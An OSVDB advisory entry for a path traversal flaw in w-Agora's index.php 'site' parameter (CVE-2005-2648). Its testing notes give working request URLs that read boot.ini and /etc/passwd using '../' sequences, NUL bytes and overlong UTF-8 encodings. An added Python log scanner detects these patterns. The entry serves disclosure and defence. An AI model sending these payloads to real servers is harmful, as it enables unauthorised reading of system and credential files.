w-Agora index.php site Variable Traversal Arbitrary File Access

2005-08-18T08:08:13
ID OSVDB:18831
Type osvdb
Reporter OSVDB
Modified 2005-08-18T08:08:13

Description

Technical Description

This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'. Further, this issue only affects installations on Windows.

Manual Testing Notes

http://[target]/w-agora/index.php?site=../../../../../../../../boot.ini%00

http://[target]/w-agora/index.php?site=../../../../../../../../etc/passwd%00

http://[target]/w-agora/index.php?site=../../../../../../../../etc/passwd

http://[target]/w-agora/index.php?site=%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afboot.ini

http://[target]/w-agora/index.php?site=../../../../../../../../boot.ini
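For defenders reviewing web server logs, the following added example (not part of the OSVDB entry or of w-Agora) flags requests to index.php whose `site` parameter carries the forms listed above: `..` path segments, a `%00` NUL byte, or overlong UTF-8 encodings of `.` and `/`. The access log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Overlong two-byte UTF-8 forms of '.', '/' and '\' (invalid UTF-8 that lenient decoders accept).
OVERLONG = {b"\xc0\xae": b".", b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\"}
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Constructed sample lines in an assumed combined-style access log format.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Aug/2005:08:10:01 +0000] "GET /w-agora/index.php?site=demo HTTP/1.1" 200 5120',
    '192.0.2.44 - - [18/Aug/2005:08:11:07 +0000] "GET /w-agora/index.php?site=../../../../boot.ini%00 HTTP/1.1" 200 211',
    '192.0.2.44 - - [18/Aug/2005:08:11:09 +0000] "GET /w-agora/index.php?site=%c0%ae%c0%ae%c0%afboot.ini HTTP/1.1" 200 211',
    '192.0.2.44 - - [18/Aug/2005:08:11:12 +0000] "GET /w-agora/index.php?site=..%5c..%5cboot.ini HTTP/1.1" 404 0',
    '192.0.2.10 - - [18/Aug/2005:08:12:30 +0000] "GET /w-agora/index.php?site=my..forum HTTP/1.1" 200 5120',
]

def raw_param(query, name):
    """Return the still-encoded value of `name` from a raw query string, or None."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_to_bytes(key) == name.encode():
            return value
    return None

def classify_site_value(raw):
    """Return the sorted reasons a raw (percent-encoded) `site` value is suspicious."""
    reasons = set()
    data = unquote_to_bytes(raw.replace("+", " "))
    if b"\x00" in data:
        reasons.add("nul-byte")
    for seq, plain in OVERLONG.items():
        if seq in data:
            reasons.add("overlong-utf8")
            data = data.replace(seq, plain)
    # Drop NULs, treat '\' as '/', then require a whole '..' path segment.
    segments = data.replace(b"\x00", b"").replace(b"\\", b"/").split(b"/")
    if b".." in segments:
        reasons.add("dot-dot-segment")
    return sorted(reasons)

def scan(lines, script="index.php", param="site"):
    """Return (line_number, reasons) for each request to `script` with a suspicious `param`."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        url = urlsplit(m.group(1)) if m else None
        raw = raw_param(url.query, param) if url and url.path.endswith("/" + script) else None
        reasons = classify_site_value(raw) if raw is not None else []
        if reasons:
            hits.append((n, reasons))
    return hits
```

Calling `scan(SAMPLE_LOG)` reports lines 2, 3 and 4 with the reasons each was flagged; the benign `site=my..forum` request is not reported because `..` must form a whole path segment.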

References:

Vendor URL: http://w-agora.net/
Security Tracker: 1014737
Secunia Advisory ID: 16497
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0599.html
ISS X-Force ID: 21906
CVE-2005-2648
Bugtraq ID: 14597